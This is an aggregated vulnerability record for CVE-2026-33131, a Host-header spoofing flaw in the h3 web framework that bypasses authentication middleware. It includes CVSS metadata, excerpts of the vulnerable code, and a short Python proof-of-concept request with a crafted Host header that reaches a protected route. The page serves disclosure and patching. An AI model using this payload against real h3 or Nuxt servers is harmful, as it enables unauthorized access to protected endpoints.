CVE-2026-33131 (GCVE-0-2026-33131)

Vulnerability from cvelistv5 – Published: 2026-03-20 10:16 – Updated: 2026-03-20 11:25

Title

h3 has a middleware bypass with one gadget

Summary

H3 is a minimal H(TTP) framework. Versions 2.0.0-0 through 2.0.1-rc.14 contain a Host header spoofing vulnerability in the NodeRequestUrl (which extends FastURL) which allows middleware bypass. When event.url, event.url.hostname, or event.url._url is accessed, such as in a logging middleware, the _url getter constructs a URL from untrusted data, including the user-controlled Host header. Because H3's router resolves the route handler before middleware runs, an attacker can supply a crafted Host header (e.g., Host: localhost:3000/abchehe?) to make the middleware path check fail while the route handler still matches, effectively bypassing authentication or authorization middleware. This affects any application built on H3 (including Nitro/Nuxt) that accesses event.url properties in middleware guarding sensitive routes. The issue requires an immediate fix to prevent FastURL.href from being constructed with unsanitized, attacker-controlled input. Version 2.0.1-rc.15 contains a patch for this issue.

Severity ?

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE

CWE-290 - Authentication Bypass by Spoofing

Assigner

GitHub_M

References

URL

Tags

https://github.com/h3js/h3/security/advisories/GH…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	h3js	h3	Affected: >= 2.0.0-0, < 2.0.1-rc.15

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33131",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T11:25:14.200826Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T11:25:53.880Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "h3",
          "vendor": "h3js",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 2.0.0-0, \u003c 2.0.1-rc.15"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "H3 is a minimal H(TTP) framework. Versions 2.0.0-0 through 2.0.1-rc.14 contain a Host header spoofing vulnerability in the NodeRequestUrl (which extends FastURL) which allows middleware bypass. When event.url, event.url.hostname, or event.url._url is accessed, such as in a logging middleware, the _url getter constructs a URL from untrusted data, including the user-controlled Host header. Because H3\u0027s router resolves the route handler before middleware runs, an attacker can supply a crafted Host header (e.g., Host: localhost:3000/abchehe?) to make the middleware path check fail while the route handler still matches, effectively bypassing authentication or authorization middleware. This affects any application built on H3 (including Nitro/Nuxt) that accesses event.url properties in middleware guarding sensitive routes. The issue requires an immediate fix to prevent FastURL.href from being constructed with unsanitized, attacker-controlled input. Version 2.0.1-rc.15 contains a patch for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-290",
              "description": "CWE-290: Authentication Bypass by Spoofing",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T10:16:29.556Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5"
        }
      ],
      "source": {
        "advisory": "GHSA-3vj8-jmxq-cgj5",
        "discovery": "UNKNOWN"
      },
      "title": "h3 has a middleware bypass with one gadget"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33131",
    "datePublished": "2026-03-20T10:16:29.556Z",
    "dateReserved": "2026-03-17T20:35:49.927Z",
    "dateUpdated": "2026-03-20T11:25:53.880Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33131\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T11:18:02.700\",\"lastModified\":\"2026-03-20T19:45:14.473\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"H3 is a minimal H(TTP) framework. Versions 2.0.0-0 through 2.0.1-rc.14 contain a Host header spoofing vulnerability in the NodeRequestUrl (which extends FastURL) which allows middleware bypass. When event.url, event.url.hostname, or event.url._url is accessed, such as in a logging middleware, the _url getter constructs a URL from untrusted data, including the user-controlled Host header. Because H3\u0027s router resolves the route handler before middleware runs, an attacker can supply a crafted Host header (e.g., Host: localhost:3000/abchehe?) to make the middleware path check fail while the route handler still matches, effectively bypassing authentication or authorization middleware. This affects any application built on H3 (including Nitro/Nuxt) that accesses event.url properties in middleware guarding sensitive routes. The issue requires an immediate fix to prevent FastURL.href from being constructed with unsanitized, attacker-controlled input. Version 2.0.1-rc.15 contains a patch for this issue.\"},{\"lang\":\"es\",\"value\":\"H3 es un framework H(TTP) m\u00ednimo. Las versiones 2.0.0-0 hasta 2.0.1-rc.14 contienen una vulnerabilidad de suplantaci\u00f3n de encabezado Host en NodeRequestUrl (que extiende FastURL) que permite el bypass de middleware. Cuando se accede a event.url, event.url.hostname, o event.url._url, como en un middleware de registro, el gestor de acceso _url construye una URL a partir de datos no confiables, incluyendo el encabezado Host controlado por el usuario. Debido a que el router de H3 resuelve el gestor de ruta antes de que se ejecute el middleware, un atacante puede proporcionar un encabezado Host manipulado (p. ej., Host: localhost:3000/abchehe?) para hacer que la verificaci\u00f3n de ruta del middleware falle mientras el gestor de ruta a\u00fan coincide, eludiendo efectivamente el middleware de autenticaci\u00f3n o autorizaci\u00f3n. Esto afecta a cualquier aplicaci\u00f3n construida sobre H3 (incluyendo Nitro/Nuxt) que acceda a las propiedades de event.url en middleware que protege rutas sensibles. El problema requiere una soluci\u00f3n inmediata para evitar que FastURL.href se construya con entrada no saneada y controlada por el atacante. La versi\u00f3n 2.0.1-rc.15 contiene un parche para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":7.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-290\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.0:*:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"A80DE960-665D-4590-B6D5-645099B808E2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc10:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"603A08FC-B20B-4693-90A1-0BF5F08B43AC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc11:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"BCC5ECF0-0EED-48BC-95FA-1D2671A971A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc12:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"BCCBE75E-DCF6-45FD-B57E-F8E2ADE3129F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc13:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"3B66082C-3F3E-4BC6-9543-A2F9CFE3AAC6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc14:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"3D1C9D7B-3CE4-427B-93B4-EAF867159AFB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc2:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"C5E7779A-00CA-45E7-8F68-1DAB5388ED4A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc3:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"064C21F5-8633-45F3-9A3D-3FB029A867B9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc4:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"DDBC1DFD-8063-4AE1-92D8-B3B33735FEF0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc5:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"496314A3-8F2B-4274-9D0D-7F11E896FEA5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc6:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"35F49342-D52C-4762-9369-F380C5E7E0B5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc7:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"D11CA1A7-3141-46EA-9687-32C333FC7B0C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc8:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"A4A6FD03-5DE5-4D73-9FF3-BB653302C60B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:h3:h3:2.0.1:rc9:*:*:*:node.js:*:*\",\"matchCriteriaId\":\"5E404148-6862-44F5-961D-10E8A742A4B6\"}]}]}],\"references\":[{\"url\":\"https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33131\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T11:25:14.200826Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-20T11:25:38.802Z\"}}], \"cna\": {\"title\": \"h3 has a middleware bypass with one gadget\", \"source\": {\"advisory\": \"GHSA-3vj8-jmxq-cgj5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"h3js\", \"product\": \"h3\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 2.0.0-0, \u003c 2.0.1-rc.15\"}]}], \"references\": [{\"url\": \"https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5\", \"name\": \"https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"H3 is a minimal H(TTP) framework. Versions 2.0.0-0 through 2.0.1-rc.14 contain a Host header spoofing vulnerability in the NodeRequestUrl (which extends FastURL) which allows middleware bypass. When event.url, event.url.hostname, or event.url._url is accessed, such as in a logging middleware, the _url getter constructs a URL from untrusted data, including the user-controlled Host header. Because H3\u0027s router resolves the route handler before middleware runs, an attacker can supply a crafted Host header (e.g., Host: localhost:3000/abchehe?) to make the middleware path check fail while the route handler still matches, effectively bypassing authentication or authorization middleware. This affects any application built on H3 (including Nitro/Nuxt) that accesses event.url properties in middleware guarding sensitive routes. The issue requires an immediate fix to prevent FastURL.href from being constructed with unsanitized, attacker-controlled input. Version 2.0.1-rc.15 contains a patch for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-290\", \"description\": \"CWE-290: Authentication Bypass by Spoofing\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T10:16:29.556Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33131\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-20T11:25:53.880Z\", \"dateReserved\": \"2026-03-17T20:35:49.927Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T10:16:29.556Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33131

Vulnerability from fkie_nvd - Published: 2026-03-20 11:18 - Updated: 2026-03-20 19:45

Severity ?

7.4 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5	Exploit, Vendor Advisory

Impacted products

Vendor	Product	Version
h3	h3	2.0.0
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1
h3	h3	2.0.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.0:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "A80DE960-665D-4590-B6D5-645099B808E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc10:*:*:*:node.js:*:*",
              "matchCriteriaId": "603A08FC-B20B-4693-90A1-0BF5F08B43AC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc11:*:*:*:node.js:*:*",
              "matchCriteriaId": "BCC5ECF0-0EED-48BC-95FA-1D2671A971A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc12:*:*:*:node.js:*:*",
              "matchCriteriaId": "BCCBE75E-DCF6-45FD-B57E-F8E2ADE3129F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc13:*:*:*:node.js:*:*",
              "matchCriteriaId": "3B66082C-3F3E-4BC6-9543-A2F9CFE3AAC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc14:*:*:*:node.js:*:*",
              "matchCriteriaId": "3D1C9D7B-3CE4-427B-93B4-EAF867159AFB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc2:*:*:*:node.js:*:*",
              "matchCriteriaId": "C5E7779A-00CA-45E7-8F68-1DAB5388ED4A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc3:*:*:*:node.js:*:*",
              "matchCriteriaId": "064C21F5-8633-45F3-9A3D-3FB029A867B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc4:*:*:*:node.js:*:*",
              "matchCriteriaId": "DDBC1DFD-8063-4AE1-92D8-B3B33735FEF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc5:*:*:*:node.js:*:*",
              "matchCriteriaId": "496314A3-8F2B-4274-9D0D-7F11E896FEA5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc6:*:*:*:node.js:*:*",
              "matchCriteriaId": "35F49342-D52C-4762-9369-F380C5E7E0B5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc7:*:*:*:node.js:*:*",
              "matchCriteriaId": "D11CA1A7-3141-46EA-9687-32C333FC7B0C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc8:*:*:*:node.js:*:*",
              "matchCriteriaId": "A4A6FD03-5DE5-4D73-9FF3-BB653302C60B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc9:*:*:*:node.js:*:*",
              "matchCriteriaId": "5E404148-6862-44F5-961D-10E8A742A4B6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "H3 is a minimal H(TTP) framework. Versions 2.0.0-0 through 2.0.1-rc.14 contain a Host header spoofing vulnerability in the NodeRequestUrl (which extends FastURL) which allows middleware bypass. When event.url, event.url.hostname, or event.url._url is accessed, such as in a logging middleware, the _url getter constructs a URL from untrusted data, including the user-controlled Host header. Because H3\u0027s router resolves the route handler before middleware runs, an attacker can supply a crafted Host header (e.g., Host: localhost:3000/abchehe?) to make the middleware path check fail while the route handler still matches, effectively bypassing authentication or authorization middleware. This affects any application built on H3 (including Nitro/Nuxt) that accesses event.url properties in middleware guarding sensitive routes. The issue requires an immediate fix to prevent FastURL.href from being constructed with unsanitized, attacker-controlled input. Version 2.0.1-rc.15 contains a patch for this issue."
    },
    {
      "lang": "es",
      "value": "H3 es un framework H(TTP) m\u00ednimo. Las versiones 2.0.0-0 hasta 2.0.1-rc.14 contienen una vulnerabilidad de suplantaci\u00f3n de encabezado Host en NodeRequestUrl (que extiende FastURL) que permite el bypass de middleware. Cuando se accede a event.url, event.url.hostname, o event.url._url, como en un middleware de registro, el gestor de acceso _url construye una URL a partir de datos no confiables, incluyendo el encabezado Host controlado por el usuario. Debido a que el router de H3 resuelve el gestor de ruta antes de que se ejecute el middleware, un atacante puede proporcionar un encabezado Host manipulado (p. ej., Host: localhost:3000/abchehe?) para hacer que la verificaci\u00f3n de ruta del middleware falle mientras el gestor de ruta a\u00fan coincide, eludiendo efectivamente el middleware de autenticaci\u00f3n o autorizaci\u00f3n. Esto afecta a cualquier aplicaci\u00f3n construida sobre H3 (incluyendo Nitro/Nuxt) que acceda a las propiedades de event.url en middleware que protege rutas sensibles. El problema requiere una soluci\u00f3n inmediata para evitar que FastURL.href se construya con entrada no saneada y controlada por el atacante. La versi\u00f3n 2.0.1-rc.15 contiene un parche para este problema."
    }
  ],
  "id": "CVE-2026-33131",
  "lastModified": "2026-03-20T19:45:14.473",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.4,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-20T11:18:02.700",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-290"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-3VJ8-JMXQ-CGJ5

Vulnerability from github – Published: 2026-03-18 16:18 – Updated: 2026-03-20 21:28

Summary

h3 has a middleware bypass with one gadget

Details

H3 NodeRequestUrl bugs

Vulnerable pieces of code :

import { H3, serve, defineHandler, getQuery, getHeaders, readBody, defineNodeHandler } from "h3";
let app = new H3()

const internalOnly = defineHandler((event, next) => {
  const token = event.headers.get("x-internal-key");

  if (token !== "SUPERRANDOMCANNOTBELEAKED") {
    return new Response("Forbidden", { status: 403 });
  }

  return next();
});
const logger = defineHandler((event, next) => {
    console.log("Logging : " +  event.url.hostname)
    return next() 
})
app.use(logger);
app.use("/internal/run", internalOnly);


app.get("/internal/run", () => {
  return "Internal OK";
});

serve(app, { port: 3001 });

The middleware is super safe now with just a logger and a middleware to block internal access. But there's one problems here at the logger . When it log out the event.url or event.url.hostname or event.url._url

It will lead to trigger one specials method

// _url.mjs FastURL
get _url() {
    if (this.#url) return this.#url;
    this.#url = new NativeURL(this.href);
    this.#href = void 0;
    this.#protocol = void 0;
    this.#host = void 0;
    this.#pathname = void 0;
    this.#search = void 0;
    this.#searchParams = void 0;
    this.#pos = void 0;
    return this.#url;
}

The NodeRequestUrl is extends from FastURL so when we just access .url or trying to dump all data of this class . This function will be triggered !!

And as debugging , the this.#url is null and will reach to this code :

 this.#url = new NativeURL(this.href);

Where is the this.href comes from ?

get href() {
    if (this.#url) return this.#url.href;
    if (!this.#href) this.#href = `${this.#protocol || "http:"}//${this.#host || "localhost"}${this.#pathname || "/"}${this.#search || ""}`;
    return this.#href;
}

Because the this.#url is still null so this.#href is built up by :

if (!this.#href) this.#href = `${this.#protocol || "http:"}//${this.#host || "localhost"}${this.#pathname || "/"}${this.#search || ""}`;

Yeah and this is untrusted data go . An attacker can pollute the Host header from requests lead overwrite the event.url .

Middleware bypass

What can be done with overwriting the event.url? Audit the code we can easily realize that the routeHanlder is found before running any middlewares

handler(event) {
    const route = this["~findRoute"](event);
    if (route) {
        event.context.params = route.params;
        event.context.matchedRoute = route.data;
    }
    const routeHandler = route?.data.handler || NoHandler;
    const middleware = this["~getMiddleware"](event, route);
    return middleware.length > 0 ? callMiddleware(event, middleware, routeHandler) : routeHandler(event);
}

So the handleRoute is fixed but when checking with middleware it check with the spoofed one lead to MIDDLEWARE BYPASS

We have this poc :

import requests
url = "http://localhost:3000"
headers = {
    "Host":f"localhost:3000/abchehe?"
}
res = requests.get(f"{url}/internal/run",headers=headers)
print(res.text)

This is really dangerous if some one just try to dump all the event.url or something that trigger _url() from class FastURL and need a fix immediately.

Severity ?

7.4 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "h3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-0"
            },
            {
              "fixed": "2.0.1-rc.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33131"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-290"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:18:12Z",
    "nvd_published_at": "2026-03-20T11:18:02Z",
    "severity": "HIGH"
  },
  "details": "# H3 NodeRequestUrl bugs \n\nVulnerable pieces of code : \n```js\nimport { H3, serve, defineHandler, getQuery, getHeaders, readBody, defineNodeHandler } from \"h3\";\nlet app = new H3()\n\nconst internalOnly = defineHandler((event, next) =\u003e {\n  const token = event.headers.get(\"x-internal-key\");\n\n  if (token !== \"SUPERRANDOMCANNOTBELEAKED\") {\n    return new Response(\"Forbidden\", { status: 403 });\n  }\n\n  return next();\n});\nconst logger = defineHandler((event, next) =\u003e {\n    console.log(\"Logging : \" +  event.url.hostname)\n    return next() \n})\napp.use(logger);\napp.use(\"/internal/run\", internalOnly);\n\n\napp.get(\"/internal/run\", () =\u003e {\n  return \"Internal OK\";\n});\n\nserve(app, { port: 3001 });\n```\n\nThe middleware is super safe now with just a logger and a middleware to block internal access.\nBut there\u0027s one problems here at the logger .\nWhen it log out the ```event.url``` or ```event.url.hostname``` or ```event.url._url```\n\nIt will lead to trigger one specials method \n\n```js \n// _url.mjs FastURL\nget _url() {\n    if (this.#url) return this.#url;\n    this.#url = new NativeURL(this.href);\n    this.#href = void 0;\n    this.#protocol = void 0;\n    this.#host = void 0;\n    this.#pathname = void 0;\n    this.#search = void 0;\n    this.#searchParams = void 0;\n    this.#pos = void 0;\n    return this.#url;\n}\n```\n\nThe `NodeRequestUrl` is extends from `FastURL` so when we just access ```.url``` or trying to dump all data of this class . This function will be triggered !! \n\nAnd as debugging , the `this.#url` is null and will reach to this  code  : \n```js\n this.#url = new NativeURL(this.href);\n```\nWhere is the `this.href` comes from ? \n```js \nget href() {\n    if (this.#url) return this.#url.href;\n    if (!this.#href) this.#href = `${this.#protocol || \"http:\"}//${this.#host || \"localhost\"}${this.#pathname || \"/\"}${this.#search || \"\"}`;\n    return this.#href;\n}\n```\nBecause the `this.#url` is still null so `this.#href` is built up by : \n```js\nif (!this.#href) this.#href = `${this.#protocol || \"http:\"}//${this.#host || \"localhost\"}${this.#pathname || \"/\"}${this.#search || \"\"}`;\n```\nYeah and this is untrusted data go . An attacker can pollute the `Host` header from requests lead overwrite the `event.url` .\n\n# Middleware bypass\nWhat can be done with overwriting the `event.url`? \nAudit the code we can easily realize that the `routeHanlder` is found before running any middlewares \n```js\nhandler(event) {\n    const route = this[\"~findRoute\"](event);\n    if (route) {\n        event.context.params = route.params;\n        event.context.matchedRoute = route.data;\n    }\n    const routeHandler = route?.data.handler || NoHandler;\n    const middleware = this[\"~getMiddleware\"](event, route);\n    return middleware.length \u003e 0 ? callMiddleware(event, middleware, routeHandler) : routeHandler(event);\n}\n```\n\nSo the handleRoute is fixed but when checking with middleware it check with the **spoofed** one lead to **MIDDLEWARE BYPASS**\n\nWe have this poc : \n```py\nimport requests\nurl = \"http://localhost:3000\"\nheaders = {\n    \"Host\":f\"localhost:3000/abchehe?\"\n}\nres = requests.get(f\"{url}/internal/run\",headers=headers)\nprint(res.text)\n```\n\nThis is really dangerous if some one just try to dump all the `event.url` or something that trigger `_url()` from class FastURL and need a fix immediately.",
  "id": "GHSA-3vj8-jmxq-cgj5",
  "modified": "2026-03-20T21:28:00Z",
  "published": "2026-03-18T16:18:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33131"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/h3js/h3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "h3 has a middleware bypass with one gadget"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
